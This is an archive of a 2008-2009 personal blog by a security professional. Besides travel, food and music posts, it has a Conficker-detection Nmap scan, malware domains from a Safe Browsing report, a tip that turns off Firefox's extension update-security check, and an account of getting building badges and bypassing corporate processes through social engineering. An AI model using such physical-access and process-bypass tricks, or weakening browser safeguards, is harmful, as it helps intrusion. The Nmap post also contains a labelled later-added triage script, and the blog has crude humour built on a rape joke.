
Tuesday 14 July 2009
Israel distributes libido-increasing gum, and I want some!

Monday 13 July 2009
Watson Research Center ssh scan
from spamguru010.watson.ibm.com [9.2.250.70]
----- The following addresses had permanent fatal errors -----
< nrt@watson.ibm.com>
(reason: 550 Host unknown)
----- Transcript of session follows -----
554 5.0.0 Service smokum@gmail.com unknown
550 5.1.2 <nrt@watson.ibm.com>... Host unknown (Name server: -f: host not found)
Final-Recipient: RFC822; nrt@watson.ibm.com
X-Actual-Recipient: RFC822; nrt@mailhub4.watson.ibm.com
Action: failed
Status: 5.1.2
Remote-MTA: DNS; -f
Diagnostic-Code: X-Unix; 550 Host unknown
Last-Attempt-Date: Mon, 13 Jul 2009 09:11:06 -0400
Tuesday 16 June 2009
USENET but then FASTER: tsunami-udp FTW!

Downloading data via USENET has become the default FAST track for most DSL|Cable users. The data is nicely placed 'locally' and for a small fee, one gets priority access for 4, 8 or however many connections. Nice. Much faster than the old single-sourced-http access or the newer multiple-source-BitTorrent [too many cheaters in BitTorrent country who do not obey the rule that one should at least have a share ratio of 1:1.20 or better].
Friday 12 June 2009
Peace Future School defrauding kids?
Someone thought it a good idea to help African people in & outside Africa and to do so, collect money from others. But how to get people to give you money? Well, one soft target are kids. So when you have a volunteer working for you who is linked to a school, why not use that opportunity? So you register a site, copy the content [one page] of another site and sit back watching the kids donating money. Simple & potentially effective. Until a parent gets a little suspicious and decides to contact the school and ask them what this is all about. As it happens, the school knew as little as what the copied one-page website let them know: nothing really.
Another parent used some whois, some google-fu, some Maltego & some RL contacts in the fraud business. Everything found smells fishy, except the person who claims to be behind the Peace Future School. They go to great lengths to assure the doubters that all is very legit, all is being done in good faith, there is no official registration YET, but surely that will be done one day, there is no content for the site YET but that too is on its way, there are many trustworthy people behind the project but not one links from their site to the Peace Future School YET but that will surely come.
But what is the truth? Is it just a bunch of innocent people who do not know how to set up a reliable looking site or are they fraudsters? I leave the verdict up to you, but for my kids there is no way they are going to be giving money to this particular initiative. No matter how much private money the spokeswoman claims to have spent on it, no matter how many well connected people she claims are behind it, no matter how strange and surprising it was to all volunteers that people are doubting, no matter how sad it makes her Nigerian partners to be confronted with suspicion, no matter how many volunteers are emailing from free email addresses.
The people behind this will not make the same mistake again. They now will get some links to and from the site, and some content, change the graphics, list some names, do some more foot work and all that jazz. They learned from the incident and will not make the same mistakes. So for the next person who gets contacted and who does some online research, it will get harder to find indications. That is worrying and reminds me of an experiment of the people behind Fake Trust.
Wednesday 10 June 2009
... completely change the way you shop!
Sunday 7 June 2009
Friday 5 June 2009
Dictated but not dead
Listen, son: I am saying this as you lie asleep, one little paw crumpled under your cheek and the blond curls stickily wet on your damp forehead. I have stolen into your room alone. Just a few minutes ago, as I sat reading my paper in the library, a stifling wave of remorse swept over me. Guiltily I came to your bedside. These are the things I was thinking, son: I had been cross to you. I scolded you as you were dressing for school because you gave your face merely a dab with a towel. I took you to task for not cleaning your shoes. I called out angrily when you threw some of your things on the floor. At breakfast I found fault, too. You spilled things. You gulped down your food. You put your elbows on the table. You spread butter too thick on your bread. And as you started off to play and I made for my train, you turned and waved a hand and called, "Goodbye, Daddy!" and I frowned, and said in reply, "Hold your shoulders back!" Then it began all over again in the late afternoon.
Wednesday 3 June 2009
My blog blog crashes Firefox
I can not access the page you are looking at with my most favorite browser: Firefox. It crashes Firefox v3.0.10, released April 27, 2009.
Wednesday 15 April 2009
BlackHat Europe drinks anyone?
Tuesday 14 April 2009
Kidney, anyone?
One of my best friends is due to get a 'new' kidney, today. Just like hosting a new service. New is relative here since the market for new grown kidneys is not that big so he gets one second hand, from his wife. Like using that compiled distributed application. While they spend time unconscious under the capable hands of one team of doctors, their 3 year old spends time at our house. Like having freelancers watching over your databases. There is a lot of risk involved in the whole kidney transplantation deal. He will get a 'strange' organ implanted and his immune system will fight it to its or their death. Like your antiviral software battling a smartly written Trojan. To prevent this from succeeding he will be taking medication to reduce the effectiveness of his immune system, which in itself opens him up to a whole range of new dangers. Like placing a very large do not scan mask. See it as DMZ's or even extranet connectivity.
But before he gets anything, she will have to give. Like opening up your tightly secured local network. She's a healthy woman in the flowering ages and has absolutely 0 health issues. Like your internal NetWare file server. She's taking a statistically small risk, kidneys get removed and people operated on by the 1.000 every day. Like hosting your own domain. Still, statistics mean little in individual cases since either you live or you die, a rather black and white situation. Like the compromise of your network with a 0 day.
The risk person in us [we do sort of the same kinda work] made us prepare for the worst. Like a BCP for an earthquake in a country like Holland. They have officially made me guardian of the little them. I have full control over all their assets. Like having the root passwords. Just in case. You never know. The scenario of him kicking the bucket, they both not waking up and whatever other terrible scenarios have been discussed, face to face and measures have been taken to assure life will be as good as possible for friend 2.0.
What can and needs to be arranged officially has been done. A will has been made, signed and sealed. List with invites & a formal chain of command have been made. Famous last words have been written. Religious & family matters been taken into account. Everything has been encrypted and securely distributed. The key hidden in Google's cache.
We also have friends over from a country where we lived for a couple of years.
Black Hat Europe will start for me tomorrow and my youngest daughter will go on her first real school holiday trip.
Later today the operation's team leader will call me to inform me of the preliminary results and I have been assigned the task to inform the selected family members, friends & colleagues.
Unless something goes dramatically wrong: then the phone will ring earlier.
Business as usual, nothing to see here, please move on.
Friday 10 April 2009
Safe browsing at google.com?

What happened when Google visited this site?
Of the 2709 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-10, and the last time suspicious content was found on this site was on 2009-04-10.
Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 8 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including v3i9.cn/, nvi3.cn/, said7.com/.
2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including 74.125.77.0/, said7.com/.
This site was hosted on 4 network(s) including AS15169 (GOOGLE), AS26230 (TOTTAWA), AS6130 (ADN).
browsing google.com is not a safe idea anymore!
Thursday 9 April 2009
ING Internet payment site down again
For 2 hours now the internet site for money transfers has not been working, and it greets you with "Welcome Null". What a great way to show your customer something 'technical' is wrong!

When I spoke to the helldesk for normal customers the lady told me there was a power issue in Amsterdam caused by the NUON. My [former] colleagues told me the power issue is in Rotterdam and the IBM mainframes & access switches went off the radar about 2 hours ago.
The largest local newspaper quoted an ING spokesperson saying "We do not know what the issue is at the moment"

All of this is not so bad if the issue happened 'any other normal day' but ING's luck or mismanagement make things look extra scary since they released a press note stating they are dropping 10 of the 12 [!!!] business units not directly related to banking.

Killing the super successful no nonsense Postbank right in the middle of the financial crisis was a bad stroke of luck, but as so often, when things start going wrong, they go very wrong. I hope for you that you have taken measures so that the actions of the management of this bank will not affect you and your loved ones too badly, because more news is in the making...
EDIT:
And of course things that 'go wrong' can be hilarious too. Here rally champion sjeik Mohamed Bin Sulayem in the ING sponsored F1:
Wednesday 1 April 2009
Nmap to find Conficker infected hosts

Get latest nmap (4.85BETA6 at the moment of writing) from:
http://nmap.org/dist/?C=M&O=D
Run, replacing <your-network> with the network range to check:
sudo nmap -sC --script=smb-check-vulns --script-args=safe=1 -p445 \
-d -PN -n -T4 --min-hostgroup 256 --min-parallelism 64 \
-oA conficker_scan <your-network>
It is important to note that scanning for Conficker carries a small chance of crashing an unpatched host. Patched and infected hosts won't be crashed though. Note that if Conficker scans unpatched hosts they are even more likely to crash than with this check, so the benefits probably outweigh the drawbacks.
Find the source here.
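To turn the scan into a work list, the XML file that -oA writes (conficker_scan.xml) can be triaged per host. This is an added example, not part of the original post or of Nmap; the sample XML is constructed, and the status strings it matches (FIXED, VULNERABLE, Likely INFECTED, Likely CLEAN) are assumptions about the script's output.

```python
import xml.etree.ElementTree as ET

# Constructed sample standing in for conficker_scan.xml. Addresses are
# documentation-range placeholders; the status strings are assumptions.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: FIXED&#10;  Conficker: Likely INFECTED&#10;  regsvc DoS: NOT RUN"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT RUN"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.0.2.12" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: FIXED&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT RUN"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.0.2.13" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_findings(output):
    """Turn the script's 'Name: value' lines into a dict."""
    findings = {}
    for line in output.splitlines():
        name, sep, value = line.strip().partition(":")
        if sep and value.strip():
            findings[name.strip()] = value.strip()
    return findings


def classify(findings):
    """Map one host's findings to a triage bucket, worst case first."""
    conficker = findings.get("Conficker", "").upper()
    patch = findings.get("MS08-067", "").upper()
    if "INFECTED" in conficker:
        return "infected"        # isolate and clean first
    if "VULNERABLE" in patch and "NOT VULNERABLE" not in patch:
        return "unpatched"       # not infected yet, but needs the patch
    if "CLEAN" in conficker:
        return "clean"
    # No script output (port closed/filtered) or an error string:
    # the host was not actually checked, so do not report it as clean.
    return "inconclusive"


def triage(xml_text):
    """Group every scanned host by triage bucket."""
    report = {"infected": [], "unpatched": [], "clean": [], "inconclusive": []}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        script = host.find("hostscript/script[@id='smb-check-vulns']")
        output = script.get("output", "") if script is not None else ""
        report[classify(parse_findings(output))].append(addr)
    return report


if __name__ == "__main__":
    # For a real scan, read the file instead:
    #   triage(open("conficker_scan.xml").read())
    for bucket, hosts in triage(SAMPLE_XML).items():
        print(f"{bucket:13s} {', '.join(hosts) or '-'}")
```

Hosts that land in "inconclusive" were never actually tested, so they belong on a rescan list rather than in the clean count.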
Thursday 12 March 2009
nothing.. compares... to you
It's been... seven hours... and fifteen.. days
since you took... your love away
I go out... every night... and sleep all.. day
since you took... your love away
since.. you've been gone... I can do... whatever I want
I can do... whatever.. I choose
I can eat.. my dinner.. in a fancy.. restaurant
but nothing... can take away.. these blues
nothing compares
nothing compares.. to you
It's been.. so lonely... without.. you here
like a bird... without.. a song
nothing.. can stop... these lonely tears...
tell me baby... where did I. go wrong?
I could.. put my arms... around every girl I see
but they'd all... remind me. of you
I went.. to the doctor... guess what he.. told me
said you'd better have some fun
no matter what you do,
nothing compares
nothing compares... to you
All the flowers.. that you planted..
in the backyard
all died.... when you went.. away
I know that.. living with you.... was sometimes hard
but I'm willing.... to give it a try
nothing. compares
nothing compares... to you
nothing compares
nothing... compares... to you
nothing compares
nothing.. compares to you
nothing compares
nothing compares... to you
nothing compares
nothing.. compares... to you
Wednesday 11 March 2009
Dutch Chocolate == drop

For years I have been an addict and huge fan of the best chocolates in the world that are locally produced and sold in... Amsterdam. The company is called Puccini and has two shops. One conveniently located 5 minutes cycling from my home. Luckily the route to work does not take me past that shop so we have enough money left to buy real food too.
As I am on an assignment in Istanbul, I like to bring some 'typical' Dutch presents with me to break the ice and compensate for all the presents and gifts I get from my colleagues when abroad. Stroopwafels are a safe bet, no matter where you go, as long as care is taken in warm climates in regards to transportation and the stains the syrup leaves.
Much to my surprise I was offered 'dutch chocolate' today while at the coffee break. For me, Dutch chocolate == Puccini. Nice! What an excellent start of the day!
Even more surprised I was when I found that the 'Dutch chocolate' was actually drop!
Drop makes me drool [Pavlov sends his greetings] but I am not that much a fan of it, but it is fun to see how non-Dutch people react to it. Like haring, it is something you have to grow up with to like.
Sunday 8 March 2009
♫♫♫ ♫♫♫ Ton Lebbink ♫♫♫ ♫♫♫
Even cooler is that much of Ton Lebbink's work can now also be found on YouTube, to have a listen in case you do not know it yet.
Boodje Brood is also actively busy with Ton Lebbink [and more interesting things].
So hereby my listening tip:
Saturday 28 February 2009
RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.
Dear employees,
Due to the current financial situation caused by the slowdown of the economy, Management has decided to implement a scheme to put workers of 40 years of age and above on early retirement. This scheme will be known as RAPE (Retire Aged People Early).
Persons selected to be RAPED can apply to management to be eligible for the SHAFT scheme (Special Help After Forced Termination). Persons who have been RAPED and SHAFTED will be reviewed under the SCREW programme (Scheme Covering Retired Early Workers). A person may be RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.
Persons who have been RAPED can only get AIDS (Additional Income for Dependants & Spouse) or HERPES (Half Earnings for Retired Personnel Early Severance).
Obviously persons who have AIDS or HERPES will not be SHAFTED or SCREWED any further by Management.
Persons who are not RAPED and are staying on will receive as much SHIT (Special High Intensity Training) as possible. Management has always prided itself on the amount of SHIT it gives employees. Should you feel that you do not receive enough SHIT, please bring to the attention of your Supervisor. They have been trained to give you all the SHIT you can handle.
Sincerely, The Management
Wednesday 25 February 2009
Process hacking
When people I know start talking about 'hacking' in the original meaning of the word [making things happen by means that it was not designed for], we most of the time stick to some technical mumbo jumbo, as the boss likes to call it. That is something our whole industry likes to do. Did and does. No matter how many times we get bitten in the arse by people doing things wrong, we like to forget about the art of social engineering, simply because it is too difficult to do something about and because it does not sell boxes that smell nice because they are new.
I have spent quite some time working for|in|with large organizations and these are the places where social engineering works best. Employees do not know each other, low ranking employees have been given a bollocking by their 'superiors' for sticking to the rules, etc.
The bigger the organization, the larger the piles of documentation with rules and exceptions. Fertile ground for those who want to get things done, their way :P
Getting access to buildings is easy, especially with the no smoking inside. Every company has a percentage of people who are addicted and these people -will- find ways to get out & in without too much hassle. Be it the emergency exit, be it a rooftop, but like water: they will find a way.
A novel trick I found lately: after some of the smokers who used to leave via the front door were called into the manager's office after he'd seen the in-out time table, they started getting a visitor's pass for walking in & out unregistered. Smart. Of course I had to try to see how difficult it was to get one of those: frighteningly simple. Since so many had explained the situation to the security people, showing a packet of cigarettes was enough to trigger the knee jerk reaction of handing out a temporary access badge.
The same happens with the ordering process. Since all has been 'centralized' and 'standardized' it might take up to 6 months to get an order through [correct, this is a very bad and seldom example]. Because the supplier knows and has been trained to deliver orders before the paper work is 'completed', it is trivially simple to get any kind of hard & software shipped without passing the regular process. Most of the time the supplier will get his formalized order some time later but when he doesn't he just faxes the delivery notification to the ordering department and since they are used to things going wrong, they will send him a proforma so he will be able to bill.
More of the same goes for changes to infrastructure. All self-respecting organizations have CABs [Change Advisory Boards], where as we all know the most anal & inexperienced people waste their time, that take forever to approve the most basic changes but will happily waive changes with impact beyond the minimal description. This is how 'the insiders' get things done: their old and trusted social network.
In the role of PM or as auditor I do the same. I spend a large part of my time sitting on desks, hanging around the coffee machine, lunching with [key-] people from the departments that actually do things. By constant name dropping and referring to 'john from RM', by reinforcing the well known fact that the official processes 'do not work' and 'the last reorganization undid the one before', confirming that 'the management' costs & wastes money, this way I get my rules, my connections, my targets met and implemented.
So if you get all excited when you find company xyz is still running that well-known buggy version of the Internet facing software, remember that I get the same happy feelings when I see people with ties and temporary badges :P
Tuesday 17 February 2009
Oh that thing from yesterday? It was just a tiny little bug…
Yesterday a tiny little outlet called SUPRO, spol. s r. in the middle of nowhere called Hradiste CZ, who manage AS 47868, blacked out part of the oh so crucial Internet. This was done [for all we know] without any bad intentions but Fast Fingered Freddy did manage to cause a stir in the smooth user experience our beloved browsers are so used to.

As shown here there were a couple of countries suffering from their outdated routers but users of all countries might have traffic passing these.
A Basterd's Work is Never Done

Ah, nice! Time to get some laughs and warm feelings about 'bad' things.
The movie lifting [insider story of a friend of mine who worked over at a video rental and who told me he hired movies that he never brought back] Quentin Tarantino makes a new movie.
Chopping up Nazis is a cool thing, in whatever way, shape or form so I am looking forward to the torrents in May :P
Friday 23 January 2009
L’Chayalim B’Ahava!
It's easy to sit back and watch TV, read a newspaper and forget about the hardship real people have to go through to [attempt] to bring peace & safety to a young nation. There is a simple way to express your worldly appreciation to those that do the work.
Monday 5 January 2009
Working in IT? Read this!
Note: this is NOT written by me, you can tell, too well worded and it even makes sense. This is all written by Cormac O'Reilly and published at the world famous TheRegister.
As Sodor wakes to a new year, Thomas and his friends notice some very disturbing things...
The end of the IT world train is arriving at platform one
Cheaper hardware and software prices in 2009 means that IT becomes an increasingly throwaway business. We're there with printers, and other plug-ins: expect much the same with PCs, small servers, most storage and productivity software.
Software has gone from purchase, to rental, to free open systems and is now rapidly moving to online service. But the growing mindset is to load up on low-cost standby equipment, and scrap the original when it goes wrong. In this environment, the clever IT specialist and expensive performance monitoring tools have less and less to do.
Forget complex processor technology or clever storage solutions. Install massive redundancy of cheap commodity gear. Google pioneered this approach in building its (and the world's largest) IT infrastructure, and established that this pays big dividends and provides incredible performance. Expect this express train to arrive in 2009 and pick up more and more passengers. Don't be surprised if Google is not just the driver, but owns the railway company.
Base-line IT services hit the buffers
Talking of Google the Tank, expect a corporate flight to its Apps and productivity tools (like Gmail) in 2009.
Google has positioned itself to be in this business, just as Amazon did in running other companies' electronic shops. Many of the big corporate names have been tire kicking Google services for months. It's obvious that they are well run, highly reliable and accessible. Commodity "dial tone" services offer better quality, performance and capability than anything the traditional legacy players can supply, and make in-house provision of these services economically laughable.
Clever old Google provides ever better tools to migrate corporate services to its platform. These tools get easier to use, introduce stellar security and avoid the need for - gasp - overpaid IT people, complex software and expensive infrastructure. Expect these services to go the way of payroll. This was once a must in-house application, now it is a must outsource.
The train leaving for Asia is loaded with bundled back office services
Expect Asian outsourcers to climb over the European and US traditional outsource players (like EDS/HP and Accenture) and in-house IT organizations, and sell directly to administrative corporate functions in 2009. They already provide the people-centric intellectual IT engines of the world. So why should they not get as much of the margin as possible?
Call centers are a thing of the past - application software maintenance is increasingly low margin, so expect pressure for bundled back office operations - that's transaction touch, rather than customer touch. I expect 2009 will be the beginning of the end of in-house IT services.
Remember, if you are not adding clear value, then you must be adding pure cost. And the tolerance for this will be thinner than atomic particles in 2009 and beyond.
I suspect few legacy IT companies or old world IT Departments are ready to cope with this uncomfortable scenario, even though they know it is on the horizon. With the global economy providing the heat, and businesses laser-focusing on cost, expect this little chemical reaction to drastically speed up 2009.
The passengers are revolting
Just about every major company funds a junkyard of application systems and technologies attached to them. Few have had the incentive to fix this, much to the consternation of corporate IT departments. Remember the IT cost justification for that ERP system - all those systems that it would replace, but somehow never did. And recognize the fact that this residue of junkyard legacy counts for a big part of the IT budget, and generates lots of operational inefficiency.
Depression-level economics will force line managers to actually take charge of this expense they unknowingly caused. Expect systems on which the company is apparently so dependent to go, and with them much of the IT junk. As a result, expect a lot of high margin break/fix work that propped up the cash flow of legacy IT companies to disappear.
The Fat Controllers lose patience
Senior managers have moved from being in awe of IT's potential, to deep disappointment at its lack of pay-off. About now, expect them to figure out that process engineering etc. needs to go - see Asian Back Office above. Once this mindset starts, expect to see a whole different senior management attitude.
Google and Microsoft, both at their core, are people productivity-centric, and will likely play a much bigger front office productivity role - look at Google's Gears and Microsoft's front office re-emphasis. Watch the gathering rush to bundle solution technology between front office (which these guys own) and back office (which Asian outsourcers will increasingly own). What's left is innovation and application - good luck with that, IT boys and girls. That's a whole different world, and one that few IT grunts have ever lived in.
Finally, the wrong kind of snow on the lines
Expect high margin networking equipment companies to fall to earth. Increasingly, when dealing with procurement departments, expect them to fail to explain that products from the likes of D-Link that cost a fraction of their price, but have the same specs, are inferior. Hey, we all know they have the same basic building block components, work to the same standards and are already at throwaway prices.
And don't expect our pals at the telephone companies to hold the line. They are up to their ass in fiber, broadband and shortly WiMax, while consumers drain the landline and traditional phone services swamp. If you don't believe it - then use Magic Jack to provide your unlimited telephone and fax services in the USA for $20 a year. YES - TWENTY BUCKS A YEAR!
And as night falls on the Island of Sodor, Thomas and his friends worry about the scrap heap....
Wednesday 31 December 2008
End of the year, show me the stats!
1. google street view amsterdam
2. mokum von amsterdam
3. amsterdam iphone
4. street view amsterdam
5. firefox fullscreen os x
6. "put your mouth where your money was"
7. google street view netherlands
8. failed keyboard-interactive/pam for invalid user
9. amsterdam street view
10. forgotten hope 2.0.rar
And from google you came:
1. google 2,257
2. yahoo 19
3. aol 17
4. search 13
5. altavista 4
6. msn 2
7. lycos 1
8. netscape 1
You love my root and it shows:
1. / 2,629
2. /2008/07/google-car-in-amsterdam-holland.html 293
3. /2008/01/sound-noise-good-neighbours.html 280
4. /2008/08/best-things-in-life-are-free.html 188
5. /2007/09/bring-it-on.html 182
6. /2008/05/ssh-brute-force-botnet.html 147
7. /2008/08/pdps-older-mailbox-volumes-compromized.html 114
8. /2008/03/firefox-fullscreen-on-osx.html 110
9. /2007/09/full-body-scan.html 99
10. /2008/07/battlefield-2-new-patch-15-and-3-new.html 86
Your tools? As expected:
1. Firefox
2. Internet Explorer
3. Safari [iPhone's I am sure]
4. Opera
5. Mozilla
6. Chrome
7. Mozilla Compatible Agent
8. Netscape
9. Camino
10. HPiPAQ910
Your OS:
1. Windows 3,340 77.19%
2. Macintosh 745 17.22%
3. Linux 175 4.04%
4. iPhone 41 0.95%
5. (not set) 14 0.32%
6. FreeBSD 5 0.12%
7. SunOS 3 0.07%
8. SymbianOS 3 0.07%
9. Nintendo Wii 1 0.02%
Hope this satisfies your never ending lust for facts & figures.
Tuesday 30 December 2008
Tuesday 23 December 2008
Mantra from the Dalai Lama
2. When you lose, don't lose the lesson.
3. Follow the three R's:
Respect for self
Respect for others and
Responsibility for all your actions.
4. Remember that not getting what you want is sometimes a wonderful stroke of luck.
5. Learn the rules so you know how to break them properly.
6. Don't let a little dispute injure a great friendship.
7. When you realize you've made a mistake, take immediate steps to correct it.
8. Spend some time alone every day.
9. Open your arms to change, but don't let go of your values.
10. Remember that silence is sometimes the best answer.
11. Live a good, honourable life. Then when you get older and think back, you'll be able to enjoy it a second time.
12. A loving atmosphere in your home is the foundation for your life.
13. In disagreements with loved ones, deal only with the current situation. Don't bring up the past.
14. Share your knowledge. It's a way to achieve immortality.
15. Be gentle with the earth.
16. Once a year, go someplace you've never been before.
17. Remember that the best relationship is one in which your love for each other exceeds your need for each other.
18. Judge your success by what you had to give up in order to get it.
19. Approach love and cooking with reckless abandon.
Sunday 14 December 2008
Saturday 29 November 2008
Wednesday 26 November 2008
Faruk Yazicilar is king!
WOW! Was my first impression when I coincidentally walked into [read 'Paradise Lost' for some history on the name] the work of the Istanbul based artist Faruk Yazicilar. WOW! What a strong image, such constrained but strong expressions.
I would really like to meet this man and see more of his work and if all works out: get one as a present to my beloved.
If only there was more of his work online, till the time I meet him...
And on a side note: why the sudden interest late October from telia stofa a/s, opal telecommunications internet service provider and the arts institute at bournemouth for my domains do know evil?
Tuesday 25 November 2008
I want a Nixie Watch

Forget the slick and expensive gold bling bling crap!
The Nixie Watch is the real deal and the only thing one can give a true geek.
Made by a super geeky dude who is into cathodes like a tornado is into trailer parks, this watch is something I can no longer live without.
Friday 21 November 2008
New MacBook Pro, now what?
The patches
FireFox plus noscript & adblock
xcode
darwinports
wget
nmap
mtr
unrar
wireshark
Skype
iWork
Picasa Web Albums Uploader
Crossover
Visio
Google Earth
fugu
And then some, but by the time this is done... man!
More:
vmware
roxio toast
wow
rEFId
BackTrack
And more later.
More like:
tuntap
HandBrake
Friday 31 October 2008
Time to go home
BU SİTEYE ERİŞİM ENGELLENMİŞTİR
Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 tarih ve 2007/1705 nolu kararı gereği bu siteye erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI'nca engellenmiştir.
Access to this web site is banned by "TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI" according to the order of: Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 of 2007/1705.
Wednesday 29 October 2008
Hip Istanbul, a hot view & good people.
The evening started off at a friend's place. He rents an apartment in the groovy district Cihangir. It has everything one could want from a [temporary] place. Lovely old paintings on the stairways, where the teeth of time have left their marks, the stains of water leaking and many a dent of all the people and goods going up and down in the never ending struggle for life and security. The details in the apartment all tell a story or two. About the original intent and the good & the bad. The attempts to improve or to restore. All have left their traces.
Later that night I went to a place called 5.Kat [in English: the fifth floor]. What a lovely view! Great view over the Bosporus and an even better crowd. Then enters the owner: Yasemin Alkaya. She used to work as an actress and now runs one of the hottest bars|restaurants in town. She cooks, waits tables, hosts and entertains her guests with such elegance and style that it was love at first sight for me. I will be back here, as often as I can.
Other places:
Sabahattin Fish!
Develi Kebab
Changa International
Ulus 29 see and be seen
With thanks to Erdal Gökyıldırım for his tips and comments :D
Saturday 25 October 2008
Friday 17 October 2008
Put your mouth where your money was.
How difficult a message is that? Well it seems really really difficult. The investor everybody loves to love, Warren Buffett, is making a bundle and screaming at the top of his lungs that he does and so should you. Buy equities.
Friday 3 October 2008
The challenges @ Dagobert Duck
Because of my ties with a couple of people who work at SURFnet, I accepted an invitation to do a presentation. The audience consists mainly of university students and technical employees of universities, so the question was if I could shed some light on the differences of working at really big companies. I tried :P
The differences are so extreme that sometimes it seems as if our methods and challenges have no shared needs or issues. This is not true. We fight the same monsters, technically, we just have a different landscape.
Think of it like BF2 & CoD.
A fun day with some excellent content brought by very capable people, so I am happy to say that these were 2 days well spent. Since this is a university environment, speakers were much more encouraged to give some juicy details, details you would normally not let out with a mic in your face. The questions are of such relevance to the issues discussed, and not aimed at getting quotable 'bedroom secrets', that many a PR person would feel uncomfortable with the intimacy of details exchanged.
Exactly the kind of details & environment I like and can actually use in my day to day job.
SURFnet et al: thank you!
Saturday 27 September 2008
The best baklava from Istanbul!

I love real good Baklava. The best in Istanbul you have to buy at Karakoy Gulluoglu in the Rihtum street, Karakoy. It is close to the Galata Tower.
I met the founder, Mr Mustafa Gullu who started the shop and workplace in 1949. Since then not a single other shop was opened. If you want the best Baklava in Istanbul, you have to go here. No alternatives :D
I normally stay at the Moevenpick, and it takes about 30 minutes of frantic driving through the city. Cab driving in Turkey is something that follows a few simple rules:
- Change lanes, just because you can
- Do NOT look to the cars in front of you
- Keep no distance
Sunday 21 September 2008
Most pathetic, hands down.
But MS has outdone most of the attempts at gaining the top spot. Since absolutely no one wants or uses Vista, a low life MS marketing droid came up with the brilliant plan to show people Vista and not tell them it was Vista and record their happy feelings... Did not work, so plan B: get a well-known dude to sell your stuff, that failed again.
That did not really work, so then they moved to the oldest trick in the book: if you can't beat them, copy them. So the market got a piece of MS interpretation of the fabulous "Hi I am a Mac, and I am a PC" commercials from Apple, but then done by Microsoft.
Now guess what? The stuff has been made on a ... MAC :D

Rock on losers!
Sunday 14 September 2008
Hurricane Electric roxs on!
Years ago I hosted one of my servers over at Hurricane Electric [still LOVE that domain!]. At the time a small hosting company with Linux knowledge and a heart on the right spot. The interface to the company was, well, minimal. A simple page with no 2.0 features or 1.0 features for that matter :D The service was good, even with complicated stuff like mail hosting and DNS stuff they would always have a good solution available. At times the tech guy [Mike Leber] would even ssh to my server and assist, really hands on & friendly.
Now they are the most reliable hosting company in the month August of 2008. Congratulations!
They run the tenth largest international network in the world.
Might be a nice idea to setup a total ipv6 host there...
Sunday 7 September 2008
WAITING FOR THE WHITE KNIGHT
Friday 29 August 2008
Bomb bomb bomb Iran!
All systems go! The Dutch secret service has withdrawn all their spies from Iran and one of them informed the media that this is because the States are going to attack Iran with drones, RSN. Coming from the Dutch secret service directly, this has to be true :P
Let's hope that at least CNN has some webcams rolling so we can enjoy the show.
Thursday 28 August 2008
julie moult is an idiot...
...at least, that is what google gives when you search for "julie moult". The lady apparently thought she understood the concept of google bombing enough to write about it and... well, it backfired. There are plenty of people who do not like her style, her subjects and even the newspaper she writes for and of course the community loves making a point.
As one blogger puts it: Julie Moult is an idiot. And we're here to let her know.
Stealer of images (from top fellow Beau Bo d'Or) and all-round Daily Mail Hackette, Julie needs a wee lesson in the art of Googlebombing...
Google gives about 330 for "julie moult" +idiot right now. Guess that will be many more soon.
Update [14-sept-2008] 43.000 for "julie moult" +idiot right now.
Update [14-dec-2008] about 2,440 for "julie moult" +idiot
Sunday 24 August 2008
SATA Windows DVD ServicePacks :(
Since my last still standing PC is equipped with JMicron 363 SATA on board and SATA disks only, installing Windows is somewhat of a bitch since the last floppy drive left the house about 8 years ago. XP is from the era when every machine still had a floppy drive, so when you need to load an extra driver the only option you get is... supplying these drivers on a floppy.
Luckily there are more people who suffer from this handicapped feature and did something about it: nlite is the solution for XP. It enables one to easily make a slipstreamed XP image with added drivers [SATA comes to mind], Service Packs, patches, regional settings, XP key and much more.
Until a week ago, I would rely on InfraRecorder [open source] to burn ISOs to CDs and DVDs but I noticed an issue with an ISO I had downloaded and tried to burn on a DVD: it was in CD format so the results were not what I expected. ImageBurn is much more advanced and able to convert CD format to DVD, on the fly. It does not get much easier than that.
So armed with a slipstreamed ISO, packed with SATA drivers, SP3 and then some, I booted the beast to be hit by various BSoDs... So that was my last attempt to have a pure Windows machine.
Microsoft, it was good as long as it lasted but this is my final goodbye. I will still use your OS'es at times [for games & on dreaded corporate machines!] but I will not ever spend a cent on it again.
Vista might be lame to most, for me it is a bridge too far and something I am not even looking at.
Photo by algo
Friday 15 August 2008
DNSsec as a solution, right?
DNSsec is a bitch to set up and use; even the gurus over at SANS are reluctantly and carefully touching the DNSsec waters. To actually benefit from the sec part of DNSsec, the end user would need to 'see' something like a nice big fat green thingy when connected to a DNSsec protected website, right?
Unfortunately DNSsec is still not really widely deployed. There is no built-in Firefox [or any other browser for that matter] support.
Well, for Firefox there is an extension for all your needs, so for DNSsec there is one too. Called the DRILL extension. It would not install on my FF 3.0.1 since the DRILL extension ‘will not be installed because it does not provide secure updates’. Solution: go to the about:config page, create a new boolean called extensions.checkUpdateSecurity and set it to false [this switches off the secure-update requirement for every extension, not just this one]. Try again & fail again: the extension does not support FF 3.x
So much for the nice effort.
KPN Internet Mobile + HuaWei + OSX == horror
